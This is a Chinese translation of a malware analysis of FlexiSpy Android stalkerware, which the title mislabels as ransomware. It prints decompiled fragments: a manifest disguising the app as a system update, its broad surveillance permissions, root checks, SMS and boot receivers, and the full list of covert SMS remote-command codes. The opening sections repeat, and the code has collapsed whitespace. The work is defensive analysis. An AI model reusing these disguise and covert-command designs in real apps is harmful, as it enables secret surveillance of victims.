【技术分享】全球最大的勒索软件FlexiSpy的分析(part2)
2017-04-25 14:13:31
阅读:361次
点赞(0)
收藏
![【技术分享】全球最大的勒索软件FlexiSpy的分析(part2)]()
作者:myswsun
![【技术分享】全球最大的勒索软件FlexiSpy的分析(part2)]()
0x00 前言
0x01 方法
监控软件有3个版本。这个非常棒,因为它包含了完整的代码注释。
0x02 AndroidManifest.xml信息
在这有一些有趣的东西。首先包的名字是com.android.systemupdate。这个可能是命名欺骗用户,认为这个应用是一个官方的安卓应用。
<?xmlversion="1.0"encoding="utf-8"?> <manifestandroid:versionCode="1446"android:versionName="2.24.3"package="com.android.systemupdate"platformBuildVersionCode="15"platformBuildVersionName="4.0.4-1406430"xmlns:android="http://schemas.android.com/apk/res/android"> <supports-screensandroid:anyDensity="true"android:largeScreens="true"android:normalScreens="true"android:resizeable="true"android:smallScreens="true"android:xlargeScreens="true"/>
0x03 入口点onCreate
用户安装应用程序时运行的第一个activity是com.phoenix.client.PrerequisitesSetupActivity。让我们看下它的功能。
0x04 root检查 cz.m_superUserCheck
实际的root检查如下。检查是否安装了4个root包中的任何一个。来表明设备是否被root。注意这是代码库中众多root/package检查中的第一个。
publicstaticSuBinaryProviderd(Contextarg1){ SuBinaryProviderv0; if(e.m_LooksForInstalledPackages(arg1,"com.noshufou.android.su")){ v0=SuBinaryProvider.NOSHUFOU_SUPERUSER; } elseif(e.m_LooksForInstalledPackages(arg1,"eu.chainfire.supersu")){ v0=SuBinaryProvider.CHAINFIRE_SUPERSU; } elseif(e.m_LooksForInstalledPackages(arg1,"com.m0narx.su")){ v0=SuBinaryProvider.M0NARX_SUPERUSER; } elseif(e.m_LooksForInstalledPackages(arg1,"com.koushikdutta.superuser")){ v0=SuBinaryProvider.KOUSHIKDUTTA_SUPERUSER; } else{ v0=SuBinaryProvider.CHAINFIRE_SUPERSU; } returnv0;
0x05 回到onCreate
0x06 com.phoenix.client.receiver.CommonReceiver
Receivers监听android上来的intents。当屏幕解锁,手机重启或者新的SMS消息到达时代码得到响应。
<intent-filterandroid:priority="2147483647"> <actionandroid:name="android.intent.action.USER_PRESENT"/> <actionandroid:name="android.intent.action.BOOT_COMPLETED"/> <actionandroid:name="android.intent.action.QUICKBOOT_POWERON"/> <actionandroid:name="android.intent.action.PHONE_STATE"/> <actionandroid:name="com.htc.intent.action.QUICKBOOT_POWERON"/> <actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/> </intent-filter>
0x07 接收SMS
当接收SMS被检测到。应用在SMS消息中查找指定值<*#。这好像是发送给受害者的一个指定的命令控制值。
while(o_Iterator.hasNext()){ str_intentAction=o_Iterator.next().getMessageBody(); if(str_intentAction!=null&&(str_intentAction.trim().startsWith("<*#"))){//lookfora"specialvalue"insms i_specialCommandFound=1; continue; } i_specialCommandFound=0;
0x08 如果用户正在使用设备
监控软件监听各种intent表明用户在使用手机:如果屏幕解锁,设备开机等。
label_65://thisisifNOsmsisdetected if((str_intentAction.equals("android.intent.action.BOOT_COMPLETED"))||(str_intentAction.equals("android.intent.action.QUICKBOOT_POWERON"))||(str_intentAction.equals("com.htc.intent.action.QUICKBOOT_POWERON"))){ com.fx.daemon.b.m_relatedToShellCmds(o.m_getDataPath(arg6),"fx.log"); StrictMode.setThreadPolicy(newStrictMode$ThreadPolicy$Builder().permitNetwork().build()); if(CommonReceiver.c()){ return; } if(!CommonReceiver.f_bool_maindZip()){ return; } AppStartUpHandler.a(dataPath,AppStartUpHandler$AppStartUpMethod.BOOT_COMPLETED); ak.m_generatesSameObj(arg6); ak.b(arg6); return; }
0x09 下集预告
下一步,我将看下CoreService和其他的intent receiver com.vvt.callhandler.phonestate.OutgoingCallReceiver,其监听去电。
0x0A 新的IOCs
对于AV行业来说,在VirusTotal中可以查找到更多的IOC。
0x0B Jeb数据库文件
如果想就纠正任何错误,在这里。
![【技术分享】全球最大的勒索软件FlexiSpy的分析(part2)]()
![【技术分享】全球最大的勒索软件FlexiSpy的分析(part2)]()
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:http://www.cybermerchantsofdeath.com/blog/2017/04/23/FlexiSpy-pt2.html
2017-04-25 14:13:31
阅读:361次
点赞(0)
收藏
作者:myswsun
作者:myswsun
预估稿费:120RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
传送门:全球最大的勒索软件FlexiSpy的分析(part1)
0x00 前言
这是FlexiSpy分析的第二部分。反病毒的同行注意了,新的IOC和我的jeb数据库文件在本文底部。这个应用很大,因此我需要将它分割为多个部分。在主apk文件中有几个组件。我们先看下assets(注意这些zip文件是apk和dex文件)。
5002:data Camera.apk:Ziparchivedata,atleastv2.0toextract Xposed-Disabler-Recovery.zip:Ziparchivedata,atleastv2.0toextract Xposed-Installer-Recovery.zip:Ziparchivedata,atleastv2.0toextract XposedBridge.jar:Ziparchivedata,atleastv1.0toextract arm64-v8a:directory arm_app_process_xposed_sdk15:ELF32-bitLSBexecutable,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped arm_app_process_xposed_sdk16:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped arm_xposedtest_sdk15:ELF32-bitLSBexecutable,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped arm_xposedtest_sdk16:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped aud.zip:Ziparchivedata,atleastv2.0toextract bugd.zip:Ziparchivedata,atleastv2.0toextract busybox:ELF32-bitLSBexecutable,ARM,version1(SYSV),staticallylinked,forGNU/linux2.6.16,stripped callmgr.zip:Ziparchivedata,atleastv2.0toextract callmon.zip:Ziparchivedata,atleastv2.0toextract dwebp:ELF32-bitLSBexecutable,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped dwebp64:ELF64-bitLSBsharedobject,version1(SYSV),dynamicallylinked(usessharedlibs),stripped ffmpeg:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped gesture_hash.zip:Ziparchivedata,atleastv2.0toextract libaac.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libamr.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libasound.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libcrypto_32bit.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libflasusconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libflhtcconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libfllgconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libflmotoconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libflsamsungconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libflsonyconfig.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked,stripped libfxexec.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libfxril.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libfxtmessages.8.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libfxwebp.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libkma.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libkmb.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped liblame.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libmp3lame.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libsqliteX.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped libvcap.so:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped maind:directory maind.zip:Ziparchivedata,atleastv2.0toextract mixer:directory panzer:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped pmond.zip:Ziparchivedata,atleastv2.0toextract psysd.zip:Ziparchivedata,atleastv2.0toextract ticket.apk:Ziparchivedata,atleastv2.0toextract vdaemon:ELF32-bitLSBsharedobject,ARM,version1(SYSV),dynamicallylinked(usessharedlibs),stripped x86_app_process_xposed_sdk15:ELF32-bitLSBexecutable,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),stripped x86_app_process_xposed_sdk16:ELF32-bitLSBsharedobject,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),stripped x86_xposedtest_sdk15:ELF32-bitLSBexecutable,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),stripped x86_xposedtest_sdk16:ELF32-bitLSBsharedobject,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),stripped ben@bens-MacBook:~/Downloads/bin/5002_2.24.3_green.APK.out/assets/product$0x01 方法
监控软件有3个版本。这个非常棒,因为它包含了完整的代码注释。
l 泄漏的源码版本是1.00.1。虽然有文档,但是它只有2.x版本以下的一小部分功能。
l 2.24.3 APK文件:这是编译好的代码,不包含任何注释。这比泄漏的源代码版本新。有更多功能。有混淆,且有大量的额外的Modules/assets.
l 2.25.1 APK:编译代码。没有注释。转储中最新版本。我们看出来和2.24.3的区别
有两个windows可执行程序和一个mac可执行文件。我还没有看它们。
计划从应用的入口点开始(当用户点击图标时发生),并且检查intent接受器。
0x02 AndroidManifest.xml信息
在这有一些有趣的东西。首先包的名字是com.android.systemupdate。这个可能是命名欺骗用户,认为这个应用是一个官方的安卓应用。
<?xmlversion="1.0"encoding="utf-8"?> <manifestandroid:versionCode="1446"android:versionName="2.24.3"package="com.android.systemupdate"platformBuildVersionCode="15"platformBuildVersionName="4.0.4-1406430"xmlns:android="http://schemas.android.com/apk/res/android"> <supports-screensandroid:anyDensity="true"android:largeScreens="true"android:normalScreens="true"android:resizeable="true"android:smallScreens="true"android:xlargeScreens="true"/>
大量的权限覆盖了对于侵犯隐私需要的一切。下面是全部列表。
<uses-permissionandroid:name="android.permission.ACCESS_FINE_LOCATION"/> <uses-permissionandroid:name="android.permission.ACCESS_COARSE_LOCATION"/> <uses-permissionandroid:name="android.permission.ACCESS_NETWORK_STATE"/> <uses-permissionandroid:name="android.permission.ACCESS_WIFI_STATE"/> <uses-permissionandroid:name="android.permission.ACCOUNT_MANAGER"/> <uses-permissionandroid:name="android.permission.AUTHENTICATE_ACCOUNTS"/> <uses-permissionandroid:name="android.permission.CALL_PHONE"/> <uses-permissionandroid:name="android.permission.CAMERA"/> <uses-permissionandroid:name="android.permission.DISABLE_KEYGUARD"/> <uses-permissionandroid:name="android.permission.GET_ACCOUNTS"/> <uses-permissionandroid:name="android.permission.GET_TASKS"/> <uses-permissionandroid:name="android.permission.INTERNET"/> <uses-permissionandroid:name="android.permission.KILL_BACKGROUND_PROCESSES"/> <uses-permissionandroid:name="android.permission.MODIFY_PHONE_STATE"/> <uses-permissionandroid:name="android.permission.MODIFY_AUDIO_SETTINGS"/> <uses-permissionandroid:name="android.permission.PROCESS_OUTGOING_CALLS"/> <uses-permissionandroid:name="android.permission.READ_CALL_LOG"/> <uses-permissionandroid:name="android.permission.READ_CONTACTS"/> <uses-permissionandroid:name="android.permission.READ_PHONE_STATE"/> <uses-permissionandroid:name="android.permission.READ_SMS"/> <uses-permissionandroid:name="android.permission.RECEIVE_SMS"/> <uses-permissionandroid:name="android.permission.RESTART_PACKAGES"/> <uses-permissionandroid:name="android.permission.SEND_SMS"/> <uses-permissionandroid:name="android.permission.VIBRATE"/> <uses-permissionandroid:name="android.permission.WAKE_LOCK"/> <uses-permissionandroid:name="android.permission.WRITE_CALL_LOG"/> <uses-permissionandroid:name="android.permission.WRITE_CONTACTS"/> <uses-permissionandroid:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permissionandroid:name="android.permission.WRITE_SMS"/> <uses-permissionandroid:name="android.permission.SYSTEM_ALERT_WINDOW"/> <uses-permissionandroid:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/> <uses-permissionandroid:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/> <uses-permissionandroid:name="com.google.android.c2dm.permission.RECEIVE"/> <uses-permissionandroid:name="com.wefeelsecure.feelsecure.permission.C2D_MESSAGE"/> <uses-permissionandroid:name="com.sec.android.provider.logsprovider.permission.READ_LOGS"/> <uses-permissionandroid:name="com.sec.android.provider.logsprovider.permission.WRITE_LOGS"/> <uses-permissionandroid:name="android.permission.WRITE_SYNC_SETTINGS"/> <uses-permissionandroid:name="android.permission.READ_SYNC_SETTINGS"/> <uses-permissionandroid:name="android.permission.BATTERY_STATS"/> <uses-permissionandroid:name="android.permission.WRITE_SETTINGS"/> <uses-permissionandroid:name="android.permission.RECORD_AUDIO"/> <uses-permissionandroid:name="android.permission.READ_CALENDAR"/> <uses-permissionandroid:name="android.permission.WRITE_CALENDAR"/> <uses-permissionandroid:name="android.permission.GET_PACKAGE_SIZE"/> <uses-permissionandroid:name="android.permission.ACCESS_SUPERUSER"/> <uses-permissionandroid:name="android.permission.WRITE_APN_SETTINGS"/> <uses-permissionandroid:name="android.permission.USE_CREDENTIALS"/> <uses-permissionandroid:name="android.permission.MANAGE_ACCOUNTS"/> <uses-permissionandroid:name="android.permission.RECEIVE_BOOT_COMPLETED"/> <uses-permissionandroid:name="android.permission.BLUETOOTH"/>0x03 入口点onCreate
用户安装应用程序时运行的第一个activity是com.phoenix.client.PrerequisitesSetupActivity。让我们看下它的功能。
对于大部分的android activities,onCreate方法通常首先运行。在一个GUI初始化后,应用检查手机是否root。
publicvoidonCreate(Bundlearg6){ super.onCreate(arg6);//ignore this.setContentView(2130903047);//ignore StrictMode.setThreadPolicy(newStrictMode$ThreadPolicy$Builder().permitAll().build()); this.o_Button=this.findViewById(2131165209);//ignore this.o_Button2=this.findViewById(2131165210);//ignore this.o_TextView=this.findViewById(2131165207);//ignore this.k=this.findViewById(2131165208);//ignore this.k.setVisibility(4);//ignore this.o_TextView.setText(String.format(this.getString(2130968605),cz.m_superUserCheck(((Context)this)),this.getString(2130968601)));//canreturnSuperSUorSuperuser0x04 root检查 cz.m_superUserCheck
实际的root检查如下。检查是否安装了4个root包中的任何一个。来表明设备是否被root。注意这是代码库中众多root/package检查中的第一个。
publicstaticSuBinaryProviderd(Contextarg1){ SuBinaryProviderv0; if(e.m_LooksForInstalledPackages(arg1,"com.noshufou.android.su")){ v0=SuBinaryProvider.NOSHUFOU_SUPERUSER; } elseif(e.m_LooksForInstalledPackages(arg1,"eu.chainfire.supersu")){ v0=SuBinaryProvider.CHAINFIRE_SUPERSU; } elseif(e.m_LooksForInstalledPackages(arg1,"com.m0narx.su")){ v0=SuBinaryProvider.M0NARX_SUPERUSER; } elseif(e.m_LooksForInstalledPackages(arg1,"com.koushikdutta.superuser")){ v0=SuBinaryProvider.KOUSHIKDUTTA_SUPERUSER; } else{ v0=SuBinaryProvider.CHAINFIRE_SUPERSU; } returnv0;
根据是否检测到root包,设置值为SuperUser或者SuperSU。
publicstaticStringm_superUserCheck(Contextarg3){ SuBinaryProviderSuCheck=cz.ChecksforSuPackages(arg3);//checksfor4packages Stringstr_returnValSuperSu="SuperSU";//defaultreturnval if(SuCheck==SuBinaryProvider.CHAINFIRE_SUPERSU){ str_returnValSuperSu="SuperSU"; } else{ if(SuCheck!=SuBinaryProvider.NOSHUFOU_SUPERUSER&&SuCheck!=SuBinaryProvider.KOUSHIKDUTTA_SUPERUSER&&SuCheck!=SuBinaryProvider.M0NARX_SUPERUSER){ returnstr_returnValSuperSu; } str_returnValSuperSu="Superuser"; } returnstr_returnValSuperSu;//canreturnSuperSUorSuperuser0x05 回到onCreate
在root检查后,应用检测SD卡中的一个文件。这个可能是检查应用程序是否之前安装过。根据ac.txt文件是否存在,两种执行将发生:一个启动AutoInstallerActivity,另一个启动CoreService。
this.o_TextView.setText(String.format(this.getString(2130968605),cz.m_superUserCheck(((Context)this)),this.getString(2130968601)));//canreturnSuperSUorSuperuser this.o_Button.setOnClickListener(newcp(this)); this.o_Button2.setOnClickListener(newcq(this)); if(cz.m_acTextCHeck()){//checksforac.txtvalueonSDcard Intento_intentObj=newIntent(((Context)this),AutoInstallerActivity.class);//ifthetxtfileISpresent o_intentObj.setFlags(335544320); this.startActivity(o_intentObj);//startstheAutoInstallerActivityclass this.finish(); } else{ this.g=newSetupFlagsManager(o.a(this.getApplicationContext()));//ifthetxtfileisNOTpresent this.f=ak.a(((Context)this)); if(this.c==null){ this.bindService(newIntent(((Context)this),CoreService.class),this.l,1); } else{ this.b(); } } 不管执行什么路径,coreService都会启动。AutoInstallerActivity有一些安装步骤,写一些日志文件,创建一些自定义安装对象和启动CoreService类。此时应用等待用户交互。细节如下。0x06 com.phoenix.client.receiver.CommonReceiver
Receivers监听android上来的intents。当屏幕解锁,手机重启或者新的SMS消息到达时代码得到响应。
<intent-filterandroid:priority="2147483647"> <actionandroid:name="android.intent.action.USER_PRESENT"/> <actionandroid:name="android.intent.action.BOOT_COMPLETED"/> <actionandroid:name="android.intent.action.QUICKBOOT_POWERON"/> <actionandroid:name="android.intent.action.PHONE_STATE"/> <actionandroid:name="com.htc.intent.action.QUICKBOOT_POWERON"/> <actionandroid:name="android.provider.Telephony.SMS_RECEIVED"/> </intent-filter>
0x07 接收SMS
当接收SMS被检测到。应用在SMS消息中查找指定值<*#。这好像是发送给受害者的一个指定的命令控制值。
while(o_Iterator.hasNext()){ str_intentAction=o_Iterator.next().getMessageBody(); if(str_intentAction!=null&&(str_intentAction.trim().startsWith("<*#"))){//lookfora"specialvalue"insms i_specialCommandFound=1; continue; } i_specialCommandFound=0;
在泄漏的源代码文件中的交叉引用中1.00.1/_build/source/daemon_remote_command_manager/src/com/vvt/remotecommandmanager/SmsCommandPattern.java表明SMS消息中的这个<**是用于远程命令。1.00.1版本的命令如下。
//Monitorcall publicstaticfinalStringENABLE_SPY_CALL="<*#9>"; publicstaticfinalStringENABLE_SPY_CALL_WITH_MONITOR="<*#10>"; publicstaticfinalStringADD_MONITORS="<*#160>"; publicstaticfinalStringRESET_MONITORS="<*#163>"; publicstaticfinalStringCLEAR_MONITORS="<*#161>"; publicstaticfinalStringQUERY_MONITORS="<*#162>"; publicstaticfinalStringADD_CIS_NUMBERS="<*#130>"; publicstaticfinalStringRESET_CIS_NUMBERS="<*#131>"; publicstaticfinalStringCLEAR_CIS_NUMBERS="<*#132>"; publicstaticfinalStringQUERY_CIS_NUMBERS="<*#133>"; //Miscellaneous publicstaticfinalStringREQUEST_HEART_BEAT="<*#2>"; publicstaticfinalStringREQUEST_EVENTS="<*#64>"; publicstaticfinalStringSET_SETTINGS="<*#92>"; publicstaticfinalStringENABLE_SIM_CHANGE="<*#56>"; publicstaticfinalStringENABLE_CAPTURE="<*#60>"; publicstaticfinalStringSET_VISIBILITY="<*#14214>"; publicstaticfinalStringENABLE_COMMUNICATION_RESTRICTIONS="<*#204>"; //Activationandinstallation publicstaticfinalStringACTIVATE_WITH_ACTIVATION_CODE_AND_URL="<*#14140>"; publicstaticfinalStringACTIVATE_WITH_URL="<*#14141>"; publicstaticfinalStringDEACTIVATE="<*#14142>"; publicstaticfinalStringSET_ACTIVATION_PHONE_NUMBER="<*#14258>"; publicstaticfinalStringSYNC_UPDATE_CONFIGURATION="<*#300>"; publicstaticfinalStringUNINSTALL_APPLICATION="<*#200>"; publicstaticfinalStringSYNC_SOFTWARE_UPDATE="<*#306>"; publicstaticfinalStringENABLE_PRODUCT="<*#14000>"; publicstaticfinalStringREQUEST_MOBILE_NUMBER="<*#199>"; //AddressBook publicstaticfinalStringREQUEST_ADDRESSBOOK="<*#120>"; publicstaticfinalStringSET_ADDRESSBOOK_FOR_APPROVAL="<*#121>"; publicstaticfinalStringSET_ADDRESSBOOK_MANAGEMENT="<*#122>"; publicstaticfinalStringSYNC_ADDRESSBOOK="<*#301>"; //Media //publicstaticfinalStringUPLOAD_ACTUAL_MEDIA=""; //publicstaticfinalStringDELETE_ACTUAL_MEDIA=""; publicstaticfinalStringON_DEMAND_RECORD="<*#84>"; //GPS publicstaticfinalStringENABLE_LOCATION="<*#52>"; publicstaticfinalStringUPDATE_GPS_INTERVAL="<*#53>"; publicstaticfinalStringON_DEMAND_LOCATION="<*#101>"; //Communication publicstaticfinalStringSPOOF_SMS="<*#85>"; publicstaticfinalStringSPOOF_CALL="<*#86>"; //Callwatch publicstaticfinalStringENABLE_WATCH_NOTIFICATION="<*#49>"; publicstaticfinalStringSET_WATCH_FLAGS="<*#50>"; publicstaticfinalStringADD_WATCH_NUMBER="<*#45>"; publicstaticfinalStringRESET_WATCH_NUMBER="<*#46>"; publicstaticfinalStringCLEAR_WATCH_NUMBER="<*#47>"; publicstaticfinalStringQUERY_WATCH_NUMBER="<*#48>"; //Keywordlist publicstaticfinalStringADD_KEYWORD="<*#73>"; publicstaticfinalStringRESET_KEYWORD="<*#74>"; publicstaticfinalStringCLEAR_KEYWORD="<*#75>"; publicstaticfinalStringQUERY_KEYWORD="<*#76>"; //URLlist publicstaticfinalStringADD_URL="<*#396>"; publicstaticfinalStringRESET_URL="<*#397>"; publicstaticfinalStringCLEAR_URL="<*#398>"; publicstaticfinalStringQUERY_URL="<*#399>"; //Securityandprotection publicstaticfinalStringSET_PANIC_MODE="<*#31>"; publicstaticfinalStringSET_WIPE_OUT="<*#201>"; publicstaticfinalStringSET_LOCK_DEVICE="<*#202>"; publicstaticfinalStringSET_UNLOCK_DEVICE="<*#203>"; publicstaticfinalStringADD_EMERGENCY_NUMBER="<*#164>"; publicstaticfinalStringRESET_EMERGENCY_NUMBER="<*#165>"; publicstaticfinalStringQUERY_EMERGENCY_NUMBER="<*#167>"; publicstaticfinalStringCLEAR_EMERGENCY_NUMBER="<*#166>"; //Troubleshoot publicstaticfinalStringREQUEST_SETTINGS="<*#67>"; publicstaticfinalStringREQUEST_DIAGNOSTIC="<*#62>"; publicstaticfinalStringREQUEST_START_UP_TIME="<*#5>"; publicstaticfinalStringRESTART_DEVICE="<*#147>"; publicstaticfinalStringRETRIEVE_RUNNING_PROCESSES="<*#14852>"; publicstaticfinalStringTERMINATE_RUNNING_PROCESSES="<*#14853>"; publicstaticfinalStringSET_DEBUG_MODE="<*#170>"; publicstaticfinalStringREQUEST_CURRENT_URL="<*#14143>"; publicstaticfinalStringENABLE_CONFERENCING_DEBUGING="<*#12>"; publicstaticfinalStringINTERCEPTION_TONE="<*#21>"; publicstaticfinalStringRESET_LOG_DURATION="<*#65>"; publicstaticfinalStringFORCE_APN_DISCOVERY="<*#71>"; //NotificationNumbers publicstaticfinalStringADD_NOTIFICATION_NUMBERS="<*#171>"; publicstaticfinalStringRESET_NOTIFICATION_NUMBERS="<*#172>"; publicstaticfinalStringCLEAR_NOTIFICATION_NUMBERS="<*#173>"; publicstaticfinalStringQUERY_NOTIFICATION_NUMBERS="<*#174>"; //Homenumbers publicstaticfinalStringADD_HOMES="<*#150>"; publicstaticfinalStringRESET_HOMES="<*#151>"; publicstaticfinalStringCLEAR_HOMES="<*#152>"; publicstaticfinalStringQUERY_HOMES="<*#153>"; //Sync publicstaticfinalStringSYNC_COMMUNICATION_DIRECTIVES="<*#302>"; publicstaticfinalStringSYNC_TIME="<*#303>"; publicstaticfinalStringSYNC_PROCESS_PROFILE="<*#304>"; publicstaticfinalStringSYNC_INCOMPATIBLE_APPLICATION_DEFINITION="<*#307>";在2.x版本中的命令变了。发送给受害者设备的2.x的远程命令的列表如下。
RemoteFunction.ACTIVATE_PRODUCT=newRemoteFunction("ACTIVATE_PRODUCT",0); RemoteFunction.DEACTIVATE_PRODUCT=newRemoteFunction("DEACTIVATE_PRODUCT",1); RemoteFunction.IS_PRODUCT_ACTIVATED=newRemoteFunction("IS_PRODUCT_ACTIVATED",2); RemoteFunction.UNINSTALL_PRODUCT=newRemoteFunction("UNINSTALL_PRODUCT",3); RemoteFunction.GET_LICENSE_STATUS=newRemoteFunction("GET_LICENSE_STATUS",4); RemoteFunction.GET_ACTIVATION_CODE=newRemoteFunction("GET_ACTIVATION_CODE",5); RemoteFunction.AUTO_ACTIVATE_PRODUCT=newRemoteFunction("AUTO_ACTIVATE_PRODUCT",6); RemoteFunction.MANAGE_COMMON_DATA=newRemoteFunction("MANAGE_COMMON_DATA",7); RemoteFunction.ENABLE_EVENT_DELIVERY=newRemoteFunction("ENABLE_EVENT_DELIVERY",8); RemoteFunction.SET_EVENT_MAX_NUMBER=newRemoteFunction("SET_EVENT_MAX_NUMBER",9); RemoteFunction.SET_EVENT_TIMER=newRemoteFunction("SET_EVENT_TIMER",10); RemoteFunction.SET_DELIVERY_METHOD=newRemoteFunction("SET_DELIVERY_METHOD",11); RemoteFunction.ADD_URL=newRemoteFunction("ADD_URL",12); RemoteFunction.RESET_URL=newRemoteFunction("RESET_URL",13); RemoteFunction.CLEAR_URL=newRemoteFunction("CLEAR_URL",14); RemoteFunction.QUERY_URL=newRemoteFunction("QUERY_URL",15); RemoteFunction.ENABLE_EVENT_CAPTURE=newRemoteFunction("ENABLE_EVENT_CAPTURE",16); RemoteFunction.ENABLE_CAPTURE_CALL=newRemoteFunction("ENABLE_CAPTURE_CALL",17); RemoteFunction.ENABLE_CAPTURE_SMS=newRemoteFunction("ENABLE_CAPTURE_SMS",18); RemoteFunction.ENABLE_CAPTURE_EMAIL=newRemoteFunction("ENABLE_CAPTURE_EMAIL",19); RemoteFunction.ENABLE_CAPTURE_MMS=newRemoteFunction("ENABLE_CAPTURE_MMS",20); RemoteFunction.ENABLE_CAPTURE_IM=newRemoteFunction("ENABLE_CAPTURE_IM",21); RemoteFunction.ENABLE_CAPTURE_IMAGE=newRemoteFunction("ENABLE_CAPTURE_IMAGE",22); RemoteFunction.ENABLE_CAPTURE_AUDIO=newRemoteFunction("ENABLE_CAPTURE_AUDIO",23); RemoteFunction.ENABLE_CAPTURE_VIDEO=newRemoteFunction("ENABLE_CAPTURE_VIDEO",24); RemoteFunction.ENABLE_CAPTURE_WALLPAPER=newRemoteFunction("ENABLE_CAPTURE_WALLPAPER",25); RemoteFunction.ENABLE_CAPTURE_APP=newRemoteFunction("ENABLE_CAPTURE_APP",26); RemoteFunction.ENABLE_CAPTURE_URL=newRemoteFunction("ENABLE_CAPTURE_URL",27); RemoteFunction.ENABLE_CAPTURE_CALL_RECORD=newRemoteFunction("ENABLE_CAPTURE_CALL_RECORD",28); RemoteFunction.ENABLE_CAPTURE_CALENDAR=newRemoteFunction("ENABLE_CAPTURE_CALENDAR",29); RemoteFunction.ENABLE_CAPTURE_PASSWORD=newRemoteFunction("ENABLE_CAPTURE_PASSWORD",30); RemoteFunction.ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT=newRemoteFunction("ENABLE_TEMPORAL_CONTROL_RECORD_AMBIENT",31); RemoteFunction.ENABLE_CAPTURE_VOIP=newRemoteFunction("ENABLE_CAPTURE_VOIP",32); RemoteFunction.ENABLE_VOIP_CALL_RECORDING=newRemoteFunction("ENABLE_VOIP_CALL_RECORDING",33); RemoteFunction.ENABLE_CAPTURE_CONTACT=newRemoteFunction("ENABLE_CAPTURE_CONTACT",34); RemoteFunction.SET_IM_ATTACHMENT_LIMIT_SIZE=newRemoteFunction("SET_IM_ATTACHMENT_LIMIT_SIZE",35); RemoteFunction.ENABLE_CAPTURE_GPS=newRemoteFunction("ENABLE_CAPTURE_GPS",36); RemoteFunction.SET_GPS_TIME_INTERVAL=newRemoteFunction("SET_GPS_TIME_INTERVAL",37); RemoteFunction.GET_GPS_ON_DEMAND=newRemoteFunction("GET_GPS_ON_DEMAND",38); RemoteFunction.ENABLE_SPY_CALL=newRemoteFunction("ENABLE_SPY_CALL",39); RemoteFunction.ENABLE_WATCH_NOTIFICATION=newRemoteFunction("ENABLE_WATCH_NOTIFICATION",40); RemoteFunction.SET_WATCH_FLAG=newRemoteFunction("SET_WATCH_FLAG",41); RemoteFunction.GET_CONNECTION_HISTORY=newRemoteFunction("GET_CONNECTION_HISTORY",42); RemoteFunction.GET_CONFIGURATION=newRemoteFunction("GET_CONFIGURATION",43); RemoteFunction.GET_SETTINGS=newRemoteFunction("GET_SETTINGS",44); RemoteFunction.GET_DIAGNOSTICS=newRemoteFunction("GET_DIAGNOSTICS",45); RemoteFunction.GET_EVENT_COUNT=newRemoteFunction("GET_EVENT_COUNT",46); RemoteFunction.SEND_INSTALLED_APPLICATIONS=newRemoteFunction("SEND_INSTALLED_APPLICATIONS",47); RemoteFunction.REQUEST_CALENDER=newRemoteFunction("REQUEST_CALENDER",48); RemoteFunction.SET_SUPERUSER_VISIBILITY=newRemoteFunction("SET_SUPERUSER_VISIBILITY",49); RemoteFunction.SET_LOCK_PHONE_SCREEN=newRemoteFunction("SET_LOCK_PHONE_SCREEN",50); RemoteFunction.REQUEST_DEVICE_SETTINGS=newRemoteFunction("REQUEST_DEVICE_SETTINGS",51); RemoteFunction.SET_UPDATE_AVAILABLE_SILENT_MODE=newRemoteFunction("SET_UPDATE_AVAILABLE_SILENT_MODE",52); RemoteFunction.DELETE_DATABASE=newRemoteFunction("DELETE_DATABASE",53); RemoteFunction.RESTART_DEVICE=newRemoteFunction("RESTART_DEVICE",54); RemoteFunction.REQUEST_HISTORICAL_EVENTS=newRemoteFunction("REQUEST_HISTORICAL_EVENTS",55); 